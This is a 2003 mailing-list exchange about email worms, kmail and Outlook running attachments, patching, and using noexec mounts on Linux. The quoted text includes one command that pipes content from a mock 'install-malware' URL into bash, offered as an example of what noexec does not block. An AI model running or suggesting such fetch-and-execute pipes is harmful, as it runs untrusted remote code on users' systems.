On Thu, 6 Feb 2003, John Summerfield wrote: > On Thu, 6 Feb 2003, Tzafrir Cohen wrote: > > > > machines is fairly slight. Consider; > > > Most Windows viruses spread by using Lookout Express and other office > > > procut APIs. A great way of reducing your risk of infection on Windows > > > is to use some other email client and office suite. > > > > Or to patch them with the latest security pathces! > > That certainly helps, but there are so many....
Well, at least 90% of the "infected" emails nowadays (actually: I guess that more than 99%) are caused by worms with very simple infecting mechanism: * an executable attachment (but a user should know better than to execute such an attachment, right?) * Abusing one or two holes in outlook (for which a patch has been available for quite a whie now) that allow an attacker to cause the reader to execute an attachment automatically. And still, instead of verifying that their software is up-to-date, people buy "anti-virus" products. (yes. this is "instead". Not "in addition"). > > > > > Another problem is that when you "open" an attachment, you can't know in > > advance if it will be a harmless image, or an executable (that may be a > > worm, even if you are not a privilged user) > > > > The more I look at evolution and kmail, the more they look like outlook's > > interface with this exact design flaw. > > Test them. > > I tried sending myself a shell script as an attachment to myself, and > tried it with kmail. > > It distressed me by trying to run it. but it didn't have the execute > permsissions. Wow! why did it try to execute it in the first place? kmail gives you the same alarming warning for a shell script as it gives you for a harmless image. Users will learn to ignore them. > > On Linux, if your users' home directories are in /home, if /tmp and > /var/tmp are separately-mounted filesystems, you can mount them with the > noexec option and so prevent users from running their own programs. > > However, It won't prevent these: > . some-nasty > lynx -dump http://www.microsoft.com/install-malware | bash This creates a temporary file in /tmp (or whatever) and executes it, to the best of my knowledge. But I believe that such a limitation will break many other programs -- Tzafrir Cohen mailto:[EMAIL PROTECTED] http://www.technion.ac.il/~tzafrir
